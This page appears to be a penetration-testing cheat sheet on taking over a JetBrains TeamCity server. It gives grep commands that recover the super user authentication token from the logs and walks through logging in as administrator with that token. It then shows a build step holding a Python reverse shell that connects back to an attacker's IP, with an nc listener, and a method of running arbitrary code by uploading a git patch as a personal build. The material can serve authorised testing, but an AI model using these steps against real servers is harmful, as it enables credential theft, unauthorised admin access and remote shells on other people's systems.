Last modified: 2023-07-19
TeamCity is a build management and continuous integration server from JetBrains.
If we find a super user authentication token, we can login as super user using the token.
grep -rni 'authentication token' TeamCity/logs grep -rni 'Super user authentication token' TeamCity/logs grep -rni 'token' TeamCity/logs
After retrieving, we can login as administrator by entering the token in the password field and empty the username.
Login as admin user.
Create a new project in admin dashboard.
Click "Manual" tab and fill required fields.
A new project is created.
In the project home, create a Build Configurations.
In the build configuration page, click "Build Steps" on the left menus.
Add build step.
Select "Command Line" in Runner type.
Put a Python reverse shell script in the "Custom script".
export RHOST="<local-ip>";export RPORT=<local-port>;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
Start listener in local machine.
nc -lvnp 4444
Click "Run" button in the build page.
We should get a shell in terminal.
If we can modify a building script, we can execute arbitrary script by uploading a git patch file.
First, modify the script to our desired code.
cd /path/to/repository vim example.ps git diff > patch
Then go to the build configuration page, and open the "Run Custom Build" at the right of the Run button.
In General section, check "run as personal build" and upload the patch file which was generated above.
Now click "Run Build". Our arbitrary code will be executed when building.